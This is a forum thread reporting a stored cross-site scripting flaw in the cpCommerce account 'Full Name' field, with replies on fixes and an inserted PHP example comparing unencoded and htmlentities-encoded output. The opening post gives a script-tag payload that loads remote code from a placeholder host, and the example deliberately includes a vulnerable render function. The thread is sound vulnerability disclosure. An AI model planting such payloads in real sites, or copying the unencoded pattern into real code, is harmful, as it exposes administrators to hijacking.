Author Topic: XSS vulnerability  (Read 495 times)
jadoba
Junior Member
Posts: 1
« on: May 25, 2007, 04:10:55 AM »

Javascript tags can be included in the "Full Name" field of a user's account settings. This code is then executed by the admin when the "view clients" page is brought up. Big problems can result from this. Sorry that I do not have a patch to submit. Filters for greater-than and less-than signs and their encoded counterparts would be a good idea. IMHO, limiting the name's character count to a set maximum would just be a band-aid for this exploit.

For instance, something like this in the Real Name field entered by a regular registrant:

notarealname <SCRIPT SRC=http://domain.tld/badscript.js></SCRIPT>

Can anyone reproduce this vulnerability, or am I the only one who sees it?

I suspect that it is also possible to do something similar to this in a product review submission, but I do not know and have not tested it yet.
--------------------------------------------------------------------------------
James Barrett - jadoba.net
Jenius
Junior Member
Posts: 29
« Reply #1 on: August 15, 2007, 05:55:55 PM »

Quote from: jadoba
IMHO, limiting the name's character count to a set maximum would just be a band-aid for this exploit.

Even if it is just a band-aid, a band-aid is still better than an open wound. Until someone comes up with a real fix, limiting the length of the account name variable (in your SQL database) is still better than nothing, and I'd recommend it to anyone who knows how to do it.
oracle3410
Junior Member
Posts: 3
« Reply #2 on: August 17, 2007, 10:07:24 AM »

htmlentities() would probably work.

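An added example, written here and not taken from cpCommerce or from any poster in this thread, putting the two suggestions side by side: output encoding with htmlentities() as in Reply #2, and an input filter for angle brackets and their encoded forms as jadoba proposed. The client record and the admin-page markup are constructed for illustration.

```php
<?php
// Added example, not cpCommerce code. A client record shaped like the
// payload described in the thread (constructed sample data).
$client = [
    'id'        => 42,
    'full_name' => 'notarealname <SCRIPT SRC=http://domain.tld/badscript.js></SCRIPT>',
];

// Vulnerable rendering: the stored name is dropped straight into the HTML of
// the admin "view clients" page, so the browser executes the tags it contains.
function render_vulnerable(array $client): string
{
    return '<td>' . $client['full_name'] . '</td>';
}

// Hardened rendering: encode for the HTML context at the point of output.
// ENT_QUOTES also encodes ' and ", so the helper is safe inside attributes too.
function h(string $s): string
{
    return htmlentities($s, ENT_QUOTES, 'UTF-8');
}

function render_safe(array $client): string
{
    return '<td>' . h($client['full_name']) . '</td>';
}

// Input-side filter of the kind jadoba describes: drop < and > and their
// common entity encodings (&lt; &gt; &#60; &#62; &#x3c; &#x3e;). It only
// addresses the tag case shown in the thread, so treat it as defence in depth
// and keep output encoding as the primary control.
function strip_angle_brackets(string $s): string
{
    $s = preg_replace('/&(lt|gt|#0*60|#0*62|#x0*3[ce]);/i', '', $s);
    return str_replace(['<', '>'], '', $s);
}

echo render_vulnerable($client), "\n";            // browser would load badscript.js
echo render_safe($client), "\n";                  // renders the literal text &lt;SCRIPT ...
echo strip_angle_brackets($client['full_name']), "\n";
```

Run with `php example.php`; the second line shows the name as inert text, which is what the admin page should display regardless of any length limit on the column.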
cpradio
Administrator
Scholarly Member
Posts: 4021
« Reply #3 on: June 21, 2008, 04:06:54 PM »

This is now in v1.2.0